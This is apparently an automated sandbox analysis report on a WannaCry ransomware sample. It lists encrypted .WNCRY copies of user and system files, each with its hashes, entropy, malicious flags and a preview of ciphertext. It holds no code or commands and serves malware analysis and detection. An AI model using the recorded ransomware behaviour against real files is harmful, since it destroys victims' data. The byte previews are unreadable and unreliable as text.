                                Preview:WANACRY!....p....... 3.J8...0.3.<Z7......s....a..E..C..W..."..s.....Tx.e.UL....{.S~2n..mg.F.&m.s.qp.1.J..Y.w0...o.;.8Y..d.r../...Bq4&;.l.+..XG..|...)....O]E..*am.%.K..pW..E.1XN3....n.@$H....Q.....3..\.ho...kC....}/.......G..T..H.!._"...Ox4..........O..wI.:....H.......(,.....!.%l.R..*.N}..{x.-.B.l/..1.BP[.'R..|....Y+V.U.u..-!]b....R...0bb.Hr....U...\.~..-..h....t%...2I...D.g..S.c..%..C.,..gm.. l.I........l."..8..b...ql....-t.3.;....GJm.>B..hF.9.......DeT...Ef..@u....$........+xsL.o.q......&.@.T..\.n..R.ek...>.c..a...a.Y.....#V...j.yv.G....].3ht..z.b.C...z.......j..5.....6 ............|.?L......8T..<...F.8..Y..].....W.e...Yo.&l..D..;.....A.d.N-......./.`.}w..E..e.0O.....}.>q.!.B.....VG?.....L..J...R...P\...KaH%.<..2P`.2........F-..o..2n8.."....E*Q..{Py..b.Y._WM.k./..D...h..^.4D}..ve1.F'...:...T.....p..]....y...%K`.....~.;..n=.*I...\...;a.D.. 8....].p-.".O1.Ws.=..8...i.o...G~...[...x.....4My.u.r*....l.3..2...!"...../..|~...+WSK|.9&..C...8...

                                C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.2107.4-0\ThirdPartyNotices.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7000
                                Entropy (8bit):7.9724099953514305
                                Encrypted:false
                                SSDEEP:192:tuvAiXVvcSQ6vej+Q4CljqiBUOO7QdNZ2oI:tuvAiXVESf2i2l/BUpcdNZ2oI
                                MD5:066854BE7A95C603A3F56322FAB5AF0D
                                SHA1:017316CA5BBF291D071189A8B080C570EE4DDC91
                                SHA-256:CF02663C8B29425AAD79E34630DFE32429CF1517F13A5CA6FB23A9DFF8D9145B
                                SHA-512:A2B58B673FD1F76D85ADFA81A1EE49F4A263E3B3416EF0A55F0EA9E817E2A2E6A2FA180906575862FB430C2D895E19EF5D35F9977C30AD3C0642CF240855724C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....Iz....f.}.hpt=."..L..F....s...s{C.9tV.]...g.!.....|..%7........`.)[6.6.m>U.i!.'.L...x.....PY....c..Dqpp.F...A.@F.z.).3.C..m.wv..........ui.3..%.Y.;8....wO0<...h%P.jJ..rId....J..,PV..........>...~..)..H.c...o...TG}Wk: .....rZ.}2!;.1/H......A....9....=.......\|...t............>....:.u. ..R`'A....(|....!/.....V..r.b..4....T.>8.N.y..N...,.E...Y.\.!..Fo..*..t#...>.x.i...U....k..N.3...[1j...l..p..kAo.T..._A6..p..8`RlfSGb..XL..Bow...M..U.S8Zk_..G.2..WM.smD....3.f....3..,2.L.,...C.I.......A...........Ao..+.`e...r...LL........Y..{.E".Z...N.k..2j!...\.....!.gZ..?u............Z....F.s2.M5.>E....l...7..(.O.K.pO!.....9x..$..<C..K..k".g.<7.7@.8S..<..4.....I.n.(.t .D-4,YK9=J..y|.....Vh...^.o.dMKM..|.J....,..Vh].b...0..;b..>d..p\...{..l...h"....zp.0S.$........'....R..U.K..i...a....V.J..o..$9.z=.EZ.~......`?..z..5.d.Qx[...;..h[bO.p.h.a.ovQ.S..v.]..V..........q..E...?..C9. h..$9.C=..p.h. 5.:.....6..U..&.Ed|..'..~..:6....p....4...!.....H.....

                                C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.2108.7-0\ThirdPartyNotices.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):7000
                                Entropy (8bit):7.970189477864432
                                Encrypted:false
                                SSDEEP:192:Yn3L+LZUXc2CHqKzt9OzwYQdXDfAQuElVUzZ8:YnmD2CHqnQ5ll
                                MD5:A8C90DBC139D2144999B27719EBF0F15
                                SHA1:629FF64D81E71F58FCEFA95CC9CE7572A2117453
                                SHA-256:E8E2E583B57B73BF55135FCB8FF0EB87A0F3C10C369EA9F58126B13CE33D0F39
                                SHA-512:346596158AE51F6DD73A09D493F4131A7C3FE2E8BAF8AC52423E004ADF56F9D9C3C287CBD6831F9714EDB3BBF18F397E0C61D288BA2A702B2597CCEEE1EEE3CA
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....-.y....ZA2^..]C.S....S..."}...V9.r.V.T..<..6X...a.......G.aY7.....=..$K_.$..8.3.b.N.Z......g,.!O-K..9..7!.`...7..E....c..5.m.A.j.....ZV#a..q. .....8.....B.`.Zr.....Un...$.v.a..+e.......aV.h?.h...UI....,....PV...t!.\..|$1....3.HO.^....RE..5p..........=.......}....;.P;....b.....}......W...3..*n.Tde.4W).d...|.....Q$5E..h.S.G..f8..a+Y...d.....F.;d7.4...%]..QI....1R!.._d.V.I..;.[1a...N-o.Y..!....Q..b..<.....k....f...\s1.H.....iG..o$.K...i....Y.&.Z.G...^.Q.y..+......F....`...V" P....3.... .@... 2....~...A.M...z....H........B..K|V..M.K;5:...8.T.Ry......Id....V.....]A..]R...\.X..(..a..X.v.4.......5.Vy.[.......<.<eS..T.T..Q.C...x......~........<....1..........W.v.ZO..\........b ..r....r.5...D..wc..X}. _W..q.XmDG....{.O+..BB...'-+.........H..T,j...+B$.+.2!w9(..*...?..C...u.:..H!.a..6-.#...i.....~..........&......L..i..T.,.).Km@.9.y.`qeC3.h..C.......Y~*.G..........}..G....{.X3......0#.+IB..n..W$.......U...!.L..`.:...C}.yy......{:..s

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\male_names.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6952
                                Entropy (8bit):7.975707572065335
                                Encrypted:false
                                SSDEEP:192:Qv9Co4tuSlwB92JDGOpoZXjSwr91EPvk9pUtlet:QvI3kmBGOsrTKtlet
                                MD5:E88DDE86FE6A01C2A8F9C085A82AC777
                                SHA1:54FE2D381A3D76E9F0ABB14D189AEFE6554E06FF
                                SHA-256:FACA9B0A539C53CDC269FE4788CDDBB1A6B1A0FEB581814FB9B6693727B5ED29
                                SHA-512:29BE707D46A5AF6C9213C862E0DDEAA2C342B109AC55259219B0791A18A531F7184E65F701F3F340A09D0C7ABE191A42C99862064BD6E4620180F71B0593C580
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......G.. ..v~d8c.u...i....a.y..z=+.'..>....<.o.K7.k.k..Y.xU..Gl:b0....c...h2|. rB?U N..K*...-...R..3%P..Xv...T.1..,....../.a..OBy....t.v..*..7............&L.uhi{5..dB. ......4`.9.,..q\..~!c...=/.VI.)a....}.O9.l./l..#.*.|..r.....S..D..9M..N......^............0]...>;sL......#......[.v3_0?.....u?.1N.J"......+.<.J.......T..4.S.2...TI.....8.....].b..,. K(S..-...-.Gfy...P...%....a...p...Y.c...HY.2..j.....6:P...C.n]$.|....3!.........n.Vy..+.P...?&.k... RG3...oFyk...H'..Pu..M~"g-.m...x...Gi.B.C.....O..%.G....`..b+./..=....{@;]......f.q..N....SJ...#p.W.o..acl.._!.N...Z..Q.)..NM..}.........u.4....\..s...d.5.DX.n...e.b.."s....<}]w..D~...N...,..hCu.8.:....8..L._>.'..g."H.If)..I.7.Y.H....E.0.....<.I`...._...M....hI..x./.%.......9..]..7....YF....U.dKB.9TS..9..8.U...!.._.......b..b.....|..z:X...e.(.H\lOz.a.V....>.`t...,.uQ.k.~.9;TE...F...}X.RnN>!s..y.:....A......p..!+....y.w0V.R....ct>..Ul%..Gk.v.1..8.....5..D.....Of..j...HCv...K...L..

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):242232
                                Entropy (8bit):7.999101401446999
                                Encrypted:true
                                SSDEEP:6144:GQOK3eUp5ZVcH83Ys62AjjPfv7rXFQvg3VyslQB:GQhBp6H83R62AjjPfv7rXFQQV3QB
                                MD5:184B65FAFBAB73592BA86259A84CE0F9
                                SHA1:A32E59E99D902ADE4E347CA8EF5DB36E56783DDB
                                SHA-256:0B7BDE5628564995A7622B89793A16BBA701F546B68962EFB0093B3B96E5D9A6
                                SHA-512:12B534F1DA57E2B3533DE94EF0B757CF7E5A7A9D240F37F5003F7DB4901FF2A39B02F5280D4BD95FA3EF91D09F16609C1E9456D51A8F30ABF22458C53816D057
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!..........A..{...{..7)..2kL....,......../Q}0...{..%K@g..3....H..of....U.J.8..NS.....X>.".9...r..K7......`@_...T....N==.e.?...Q..t@..yl#l+7gIf.ed..."KL.FH.).d.$..0E......(.kD.l..aB...\.G2.;.y..%.2....8.,Xk.+.Lzu..?n>.9.....T...{.!H4.f....'..+...................f9S.2..1L.O..@.$......:.P....U.;.....u....z.mb..<..s.H.F...G{..Qe^'.".........1......4.Hl.v.Cy..u.-.=.q..T.Y.}.M4I.d.B._,......bHt..0..1..3R!A.*^....%.$.{.....4.Z.^.f.f.D..5.......[..vb.(...y.`.(.t'...L.Xd,=>>.SX .e.7.FfM.\C.,.^c!o..AybXY...N..x<zk~...u....^.......!....x...`8....T.....M.0.b.8..F...i&8`..'N.H..>.......a'.,.7...._...#...;up.,K.s.K,J.PD^zo_7..I..,....3.....3...9w....H........`.G..T..-..oTT.......B.H'0..M...8>........G..}...>.D.*.\...C.....0. .$....<.....z....k^.......~]..1..@.......@....>...o....Sc..<SB..#..a.+pwF.....~."p.]...(.(....U..o....Vh..hO.ce..K..s7...P...+..(.j..u2e...]..._...n...~#.,...jr&(+i.o..drm.[[D...C...Rf&t....sR.r..d....i3.<..%..../.Y.|.[.Z.P

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\surnames.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):76360
                                Entropy (8bit):7.997792662915774
                                Encrypted:true
                                SSDEEP:1536:KsqF2AYHp2SIFSFU128vndiHuEusRdY44fqI3qQSHoGq10vQ:KsiYHV3G12yOu2z3IaQ910vQ
                                MD5:24E06A9110A2A0C40D10CAC653EAD0F7
                                SHA1:52A68E5D3A6C812DC5A2C1F582BF67F80A3D8086
                                SHA-256:AA54BBB346444118790FB2EF9584561D47AC548FDB8B9019F532C7BDC9FDEB34
                                SHA-512:525283A80356E899AB10FC1D07401F33E402CBEBD87AE581B370E7E3BB5256448EB44C991355D82398A271DB40B17E5265ADD0A3E167DC005C6EE0D27DCE7FF5
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....I.UNM...qj.....)I<..r....z`..Va......El.i.~.0./~;d.E...rd.o..c.O.9..'...'f".....o~)j..G..S....PF..j...H..b.<7U.z........3X.....f.=...."........rq.N....U.xcz....M..F...O. 4.X|.8.Tl.-.<S.......E........'.h~,....B\..1.....F0%k=.%.t.../.......#.<.]....-)......|.3.i.........H.Z..0.......D...v.&kKf.sis..].....H.r....T.s#.Q.uu.;.C.@.3..V:.(z.E..G2/l..p...LcA.H.)....4........F.0..........,....D}s_.D..V9BC...2..Y..(.....P..AV@9...=JU.aG.>..?b.<@.%.i..&.\.zr'...k...0C.k.3.4.. ........t)..Xx.8.u.....0...5]...]..zV....9.,p.4.....IMpwd..mk...?.J|.K../&.[/+2..!.@i.......Q.......0I"oDI.F.+...j..F........S..B...f.*.5.4.K...+.j..<)..i4..9..c..P.....!t..F..n..n.. TR......=.{I..K......{o..#.".....n.>...v,.".Du*.1...a...o...r......le...L.6.h.i..;..b...f].3.,..$.z.C..A.jp..#qrQ.*W-....y..F...k.=....S....q.:i.U%.*EIW.fT....e?l.S..,.t...."@6...<H..B`\.....b...{..W..{.}I..*.7_-.1U....B$97>....3W..0.Vt._.c...l{...E...W#.;..Lv.js..&.!S.".\....@....]..m...H.....g]k

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\brndlog.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4664
                                Entropy (8bit):7.960784159131869
                                Encrypted:false
                                SSDEEP:96:oA8r8pCRpMqDCMU1CHRccjdZraJriCESoG4LZE/mX6xoVIGn9sSx8:WruCgG40cwbG4CEQ4LimXR9u
                                MD5:D8DD3B60700B22DDAA57FAE8BE94CDD7
                                SHA1:35E8549507C92C920BA0C99D62BBE4FA25E93EBE
                                SHA-256:D0408C9D1318C5817CA57E83007534975C6EF8123F41A45F669CC18822EC8AAB
                                SHA-512:933A8FE1E3C816CADB2E8EE101181EE812626DC30294E8849F1A79D7626B1EBFDC97DC36EC0F445E04B3DCAA7790A9FB6D5167248525483582D8E404488CF290
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......y...5K."..N..m.[t.....k..o.>.D+....'...)...}g2.s..\....\C.c...Z...@..q......k3.[....j.*Pn..g.&@U.....M..?.[......a..../.......Y...b*&..c4.l..e..C......:. *g...}t...(.......a5*.~.)fS......;=d"}pn.:.*.p5...$.3x!vYH.go.....f....:...z....-...k............)....[.....E..6~.g.(-f`..&..]a<...P"..]liN.6.)XW........:.g;w".......F......b[$_2.pJ9.Y.../U6.b..........0...|.....C....Y.e........R..2{H..M5.I....{.<...pn!.2Mo2.6..5Y........Cl................*..7.F....R5...z.....".L....o...+......e..D.".rooo.a..Wl.,3...:..[Y......6.i.(I...n.....wO.).G|._.Y..'p.Wr^:....`.0Ds.|?...L.J.r.q9..F_.......7..e0gRq....O$...E.G.R...._\V0......!u~.......`.d...f^..p.%/..)......N...Q...:M..l..2..s.....ZU.0v..Vj&.1@..D.U...dL.!....?.j.({....p.....2.^..<.t.,..r..R.?..........\F`....\$.y.KC-CH....-......&.&wT[.. ...:.Rs.......g..95.+......I.h[<.....$..P....~F..Uh.I.Zq.8..#O..nZ...P.4.R8?.%].t.@.]9=...@.I%o..y...../..U\..w.4.B\J_....[H3.S.#8."...

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Notifications\wpnidm\1196d63c.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6360
                                Entropy (8bit):7.968269376079092
                                Encrypted:false
                                SSDEEP:96:oZyW/DVZWXea/zkZWQyoxIsdDGdzcb88z4KxjZG2DMvTvDuOb7Ei/5HCOH7IoUSs:8NUOSkEiIsdDGlr8s+Q2W/Hx1EoUS6F
                                MD5:CD8FED9BA729C7CCFC1D743C315EA366
                                SHA1:AF263276907B15E9745629662863620AD713870B
                                SHA-256:5ECEC5756E8F250AD2152DBA89C767332162BABA7DFB288006B715151432A6FC
                                SHA-512:CB32C31F2E2868F444A94AE8F29C7CC882566EA71B4A54B7B048E754AD9C1A7014092E0681DA6C25B3088D72C3819F346327B66CAC23C345AB2D14748E377CFF
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....d{..........~fT.. ...\..-l....H.....L.[.qGh.X...!0.w.........{....f.A.b...Y^AE.ID...I_..?...7.;.....S...,..m.^..R...."..H...|3...Cb..X...U9...n.M"R.aa..ZW.^......S.....4ytu....8"p..F....uSh.~@.3..|.-C.X.1X.C...Q.s]#i{_.Ll...x9..F..}E8Y..............f#WL..I.....:^m.Q.!N.{..`Q..............?P...[.J...S..9VBn..P..i...9.S..s...>].TKgU'..9NL.".o.>nH.Gp.C....^...U...g.7....i/1.b..J..1.....>..A......Q....TX{.L.%0...@.(..#....`..@.cS.........;..!..dt.".t..X,....{..D..%.|...{A@.........7v...tO.{.....T..(r..c.....a.........@...C9j..DXs<B.J....4Z..$..v..oz.3*N..}.lr. ...Re....|...qi..N.L......"..\VW.tB..(......y......F..&..#.y.).2.U!.Q...o.G.^q.vf.?...Y.q.-.NA.m...R..w.iK.).._o.Z}n..).g.IU.h..q....)zO%Dj....j..N..1p..!&.=...d.p..hk.x.........h......K~^..hT....x>....;...F.X.X..$.b.....J.&z\.Ex$IO84...7hg'...=...ER..5.6....A%..I.-.p.L....9.JB.......]..6N.R..0H.s..jJ..Z.4...$l:.FG.L.....LM;;.N.....\}$..`3........c....m2..l.

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Notifications\wpnidm\2b67b297.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6760
                                Entropy (8bit):7.9723794854002925
                                Encrypted:false
                                SSDEEP:96:o5bbu2x780E+CT43jDQtYOE749bNr0P62CrfSlzUlqociJJP6hAOFnRlqdEglVVT:odxCXsMYvMPpbizUlf36hlqKSWMds0x
                                MD5:F3EECA1EE5BA232BABF378A5597FFE9D
                                SHA1:46DCE39A41D5FE252B5988D07DAFB90232FA8197
                                SHA-256:204CA60EEA6AAFC05E3A248BB7DC5DADE8B29E76025C3E22085ED7E346232917
                                SHA-512:02FCF223D52FE7EBF47160CD7E21EC903168F02E2144229F76D77CC8474F9B884D0E34F123B96AFB2343D7BCF31EDB4C01DDDE58A8D8281E8FCB8884AA964500
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!...........#Sc.j....'....B.f.Zz..]h..Y..~...+_.+.8.b.n.|U...........Jl..^...T..I.7.t.=.T..eM.*g#j...}.u."...W...F.....O....c..x.<....T.?..">o{.d...^...)v;).N.h.k..:.N.T.....fw..v7.N....]xQ.6^WL9.JO@../....mi.]....u...x.....V:=G...V..X.w #5o.eh....G.a....K..............3f+qv#TH"].o........5...4....n.....-.p./._S.3..#. .O..$u....d....j.b..."8L_p.D.........d.~..[..v*zq+....fs.].....k.4S.s\.q/#u..d........*..@G..d. ...m5......#N!I.m......OU.k..D..x..Zl.,.....YF,..20........7.]......../.y.>.y...2.,G....W..}..Z..1..B.'..:..y..,h5u.T`..l.. .*...(.}....E.8c...J..u.l...:.f(...cb...\...Q|.@...$......x..k..lN;.UV=.7..6....B....U.h.A...K......Gs.B....I.YT:..+'.O/...o\.......b.]u.......)..&.^p....BO((...........L/&a@..(b.,?./S.....lm._.....G/..K.S.......ot...wF.`&Z^.}M.s.....&..K....$..a...b.6@..q.p.|...j...7@....?.l........W.?.D.8R.(0J#.".A.p.a.+....d<n.......)|....+...0....I.\(.../~.1.>.N.'........."...~,...ZJG..+O...k..yT..D<.uV.w....c.m&EuX.5...4

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Notifications\wpnidm\5fc0968a.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5240
                                Entropy (8bit):7.958309648726187
                                Encrypted:false
                                SSDEEP:96:oVP6mIe4uXZTF4WAGG2fA13GXFTNcVlV/hknKh0stt0YudLvNqmkO4/QkrjP:q6mWOZTqWAV2fA1VVHhkKh0UtBudLVqL
                                MD5:57EA8BFA0BC6FEA802FF681FD6AA5E5D
                                SHA1:B86D1D41D2BA4FDB35B2D24473B9A797E3084EF2
                                SHA-256:69D66298AF330BD5E0CD61450E80B1B9642F07635191AB9065A688B1A07B1FBA
                                SHA-512:F69E00725E05490E505114B8F58C3BA8B805F0E62D8F3AC9E369D958FF4B519C851E9F95EA7D619C4DF636547EF89E3B3BC8FDB39444C34E97C5BF6BEF701C00
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......<]..f.M!a..A.....+...Q.+.x`....j...\.|;.L...8...L..C.._H.^...6&......... =.......E....l..Y.Z......%...".h.......I........i<..e......I.L7.y...H.94W...r7qo.#..G.b....n'z)7...M.q..,h..!.5..j.bM......L<{.g.6C..B...M..xpw.]..6.......B?..p.....!.tF..n....X........X.X.5#.....S.-4...R..._.........V....y.;6..R..k.],..p.V.:.........5....gm......F...X.....b...j.CU..S...m.,e.......z.|..ua~.P.$.5......9Q.>....li...x.'.c..6..~../..U..'...4w......[f?,..V.p..Ds.@'.:c.V.._{..+..0..w..Q.l|.=i.9.uqq..../.1.../..b..:q...n...d1....YEo~S..#...-...V.....W.J....2Za.X..k~...I.). .Wl>..w..........u.f..|V.a..U.(70|0...M.tX..Z.}.8..h...~.@M..;.e*...y.....g...T..tH..M@.5.e.....U.......j./^...:.d}17.aY9...x......<.)..B....C.Y.^/w.&[.E.!.........bU]x.p#e.T.....x..U.Qp&5b.........Z.Z..=.8..j]......=.?i.....`.....K.>*.U..."..&..u...6p....D.\....\o. z......L..,m.l..)#N<.... ~....]7...-.`.Q..........@)Y...w...............>]./...m`.Edd....?T."l}.D.<.._f.....

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Notifications\wpnidm\70af9816.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):9736
                                Entropy (8bit):7.98117084151071
                                Encrypted:false
                                SSDEEP:192:G8lrzfphOHjjeAqRivkTg2kH1sSUeSBWSs9i3XJUCtodocNY:Nrzfvkju3g2kH1aeSoSd3XJqoAY
                                MD5:8C860A81B1BCD0271DF7E7E5A48954CF
                                SHA1:F940B7BE4ADFDB833051BE854A203B3AEEE4B3C0
                                SHA-256:A0052C3DF627C14CB024DBF9FE05407DF86958CD732A2BAB966AF620FE48DD84
                                SHA-512:CC1388EDA52B4B4E59DE7FC6BFB978DABA0483463958FCE36E35656D7950D83FBFCC0AA2B0EEF4CE002059D57882A2B61FE28D19AE7D24735CB9686B9B222F6B
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......k5..N.]..E..}.j...h<...D.9f..ZTs.....,..L.....#......X..V<e.1.. sq.-.IG...x..T...p.5.l.j... ......%P.50.w..8.<..&..lz..*....BQ!$..29=4]2(......).Y...%..C]....j.K..VD'.%Y.n...(g.0\XTr.7...i7O.b.^.;.1..v..w........j..a).e..m84....(......<..;NW2..l.u.....$........!...D.....P8<..c3.[.Z.......b.....a.6-.T.5.....}...<...I.t.......b.5...sP..-....z.......v.NQ.+..P.6.Dh2...T./...u...@P../6=.?...zY.(....fc..k...1.a.$.2!5.#...W.....&.i\.3@.IX.B...9.^o..}.##p.Hp.}...<k./i.&.p.)aM.......7..F.GF.N.u.B.u!R..."[L..d..e ./.@.C..t0k.....V.../..........i*BK..8.....S......l.."..UT9Vec.O.;.T.....0r......}.*...+..%4...b:./...j.....a.*.:.u\En.[.....6#....\.f....a...i.x.ox.U........g|[..)J8:.......l..w.r....9.c.?G#.?g...M.s.jV......d.(..oo.FN..%.Hh..C..^.....2u`...9..^.~S.A.d.E.....D.L>...RhQ ..e|.....L........K.4/...:.(z.._'}M...V.-..x..4..|......I.?....v.l>u../.Z....%J; TOD...G.S..J..x.XN.Y./Zk...5x[.V.T....t..._.o...y:.<.s..^..*.e.cZ.....0.e|..h-.G.<.

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Notifications\wpnidm\8fce0f3.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4552
                                Entropy (8bit):7.950845170731367
                                Encrypted:false
                                SSDEEP:96:oKpxEQ2L7p+nFKt9Rmb3I+2oPAPPanmnW1jQgi2kT7idtTGpIEstJRAsJACny:BpqQ2L7p+Fw98b3HF46n8AQBwislpACy
                                MD5:5B25EBEA404626C78B60F9291C3EC131
                                SHA1:11F6CF9C39CC28D64BAE585240B1275C9762FB1C
                                SHA-256:94671D5C0B5B4FBEF588A4F8A611B57FA17B2B5EFA5D8808256DD61A6C88F15E
                                SHA-512:C908A3A1358EA3B2884E0686840CF5A05C7B943BC316C9C4D00B5067570457647C5BC9F4D537ADE5BDFF45D0A4B3F3A268F941F603D3946951B266895CF5FB9D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......k...*...{`|..jD... ..P{..k..sY...K.....=Tbp..d..#iP#.J.+.n...T[...9..$...P..4....Hl!.fY/..^...v.d..u.4....ncuRb.pWj.EB.]>^..zB|.d..y.?..?l...,z.........$..D..p..x`..&t..S....J..?...Bd0.&)..0.....`.iZ.w..9\.\eT.,..Q..#.h.$.!.A.M...q.X............C............>.......3..?d.........<?)H^..e,.L....Y..P...{S..)...`:..{.XF....>x.Y...f2..{....9'_.GgE6.....H...)m....P.S.w....t.8..C..%.~}..tM......E.<...6u9......h{.\.P.......l...J.9K..y.7.d,.....x.b.#...F.w.C.._j.....o....E......&.Q....{......l..e.9.&.d!8.?r.k..?=..s.o<I.e\V..<o?Oe.0..%.9.C.~@J..b.t4..n|Zu%..}$s.+lRR...O.J8...lS..w2..V<y.........*.'.[6I...._.a=....>......kWC....XLU-.+..Y........(.?B.K*..r...7.B...4D...+.;.D.v..&.4.P.J<.)..O.t....HZ...........g.6.M........4.Z....xRY.|.s...0.3D+e{.M2d..2.......K..n.@.An..P....{..}...6......$.s...,.h1[2m.T.q\O..B......=Q.L..Q..mKBOUT..-.9....r.L\+.y]..~v.7..\....>Gf..r...z.K......0.s...W..q..c"...Q..E...........2}*..@..v.d.....*....

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):277304
                                Entropy (8bit):7.999336732929792
                                Encrypted:true
                                SSDEEP:6144:djsQfYj/Hbz3sj6HjDN4ywoDuf1ZMt1ocXno7os+zS:dFQj/XcjujZ4lx1s4+zS
                                MD5:7168FACC3FCC45A39607976113136A3B
                                SHA1:1ED82154B119531E61E8BFCD91A7A99373CA5F75
                                SHA-256:BA0BEE8A029E62F9E3995700D90B3D2CB2F3A04EC04780D9D6547728CD061CCC
                                SHA-512:8A904B6A7E61CB99BEAC537BB2B9489F76317DE3C832B341BC80E3A3670134D6C7154E19E9DEC54A81DF2801430B3114F3BE4DDF96A75A67CD29398B0150A3B1
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!........W...L..#f..;s..s.J.....<......j..9...K."\.2...-..2.X....FY...DYA.C.....c......{$Et.q.l.-J..s'..v..2.4&W..^K?..9N..D...._U...g!...<8......h!37.r..%J.*a</2.QO..d.."j4.)_......>.rP.`..<S..=...q.........t..a.R.jK.. l.....Y;..........D...0.=.<.EQ........:...........a.^u/nF2g.....!.....z........w...X].{..?.l...?.B..H.....+..t).A..HT.Q+.0V#.P.].l`..!x6.G...Hxg.....f. |...N...N.r...L .....m.rm.........8.q.X..6.^".]cF....a....b.u....n......m...l.=`..B.1r.."..(.Dm.*.?...Q.Xe.)_..y.<.u...9>..?aS.m.7......-..O....)g.}...R...LE..l.....6.-.b...lC..-(..8..A:.q...H.OPx......UMQ.l4.Pu...@.7D........a.p.W.. .@n...g.Q..x.p......[.@.w..M...w..d..wul.Ln.3.t.Q.....a.~T<...<.c.D.....\...QL...KC.Qh..G'........v?..h..'_.J...?.g....Uv^q.d.;....(..O...Z.....O. .G.Dv+.o.>ZAI8Z...n.......gz....d8..}.V{v..C.|..,.XFo.t..g.X>.|I.`..@....&...qIw.....".~..D...E.vw..%.:..=j.V.f^..A.u.|...........`......X3...:.....&....'e7&...4....0..>.u.2..A...m.`....?...

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\female_names.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):27000
                                Entropy (8bit):7.99393022209552
                                Encrypted:true
                                SSDEEP:768:bCDqZ8Y6HN1sYJoq1T9mUhZfmLl5gs3jP0m/YXu:mqZ8Y6tOYzT9rfmEs3j8mEu
                                MD5:2B5CA8DD54103D6C565BEC4533DEFA27
                                SHA1:825D49866E3FA225CC1C4024F6665491FD9AB95D
                                SHA-256:D55B05EE09A5A4006148EC1529CB8E613034D91EE2B3A557A28C0C5885E47145
                                SHA-512:DFB99BE6E7F11CD0762D0F898AC68860C1FD9AE8BE7D57855BFCA56B03455A1FEA0480A67466FD6C464ADE9D75C348FD18F9311C362364BA5B04188D55D86248
                                Malicious:true
                                Reputation:unknown
